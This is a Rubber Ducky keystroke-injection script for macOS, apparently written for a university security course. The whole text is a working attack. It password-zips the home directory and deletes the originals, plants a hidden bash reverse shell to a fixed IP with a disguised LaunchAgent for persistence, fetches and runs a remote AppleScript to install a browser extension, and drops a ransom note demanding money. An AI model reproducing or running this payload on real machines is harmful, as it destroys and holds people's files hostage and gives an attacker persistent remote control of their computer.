DELAY 1000
GUI SPACE
DELAY 500
STRING terminal
DELAY 500
ENTER
DELAY 1000
REM Go to home dir
STRING cd
ENTER
DELAY 500
REM Put everything in a zip and encrypt using password “superpass”
STRING find . -path ./Library -prune -o -print | zip -e -@ files.zip
ENTER
DELAY 500
STRING superpass
ENTER
DELAY 500
STRING superpass
ENTER
DELAY 5000
REM Delete everything in home dir and only leave files.zip
STRING find . -not -name ‘files.zip’ -exec bash -c 'printf "%q " "$@"' printf {} ';' | xargs rm -f
ENTER
DELAY 5000
REM Create a backdoor script in a hidden dir
STRING mkdir ~/Library/.hidden
ENTER
DELAY 200
STRING echo '#!/bin/bash
ENTER
STRING bash -i >& /dev/tcp/192.168.0.11/1337 0>&1
ENTER
STRING wait' > ~/Library/.hidden/connect.sh
ENTER
DELAY 500
STRING chmod +x ~/Library/.hidden/connect.sh
ENTER
DELAY 200
STRING mkdir ~/Library/LaunchAgents
ENTER
DELAY 200
REM Add the bash script to system startup item list by generating a plist file
STRING echo '<plist version="1.0">
ENTER
STRING <dict>
ENTER
STRING <key>Label</key>
ENTER
STRING <string>com.apples.services</string>
ENTER
STRING <key>ProgramArguments</key>
ENTER
STRING <array>
ENTER
STRING <string>/bin/sh</string>
ENTER
STRING <string>'$HOME'/Library/.hidden/connect.sh</string>
ENTER
STRING </array>
ENTER
STRING <key>RunAtLoad</key>
ENTER
STRING <true/>
ENTER
STRING <key>StartInterval</key>
ENTER
STRING <integer>60</integer>
ENTER
STRING <key>AbandonProcessGroup</key>
ENTER
STRING <true/>
ENTER
STRING </dict>
ENTER
STRING </plist>' > ~/Library/LaunchAgents/com.apples.services.plist
ENTER
DELAY 200
STRING chmod 600 ~/Library/LaunchAgents/com.apples.services.plist
ENTER
DELAY 200
REM Add the plist file to system startup item list
STRING launchctl load ~/Library/LaunchAgents/com.apples.services.plist
ENTER
DELAY 200
REM Download AppleScript from github
STRING curl -o chrome.scpt https://raw.githubusercontent.com/uscitp-zhongyag/itp325/master/chrome.scpt
ENTER
DELAY 2000
REM Run the script to add Speedtest to browser
STRING osascript chrome.scpt
ENTER
DELAY 8000
REM Quit chrome after installing extension
GUI q
DELAY 200
STRING rm chrome.scpt
ENTER
DELAY 500
STRING cd $HOME/Desktop
ENTER
DELAY 500
REM Create the ransom text file in the desktop folder
STRING touch readme.txt
ENTER
DELAY 500
STRING echo "give me money to unlock your files or ask chi for the money at chiso@usc.edu“ > readme.txt
ENTER
DELAY 500
GUI q
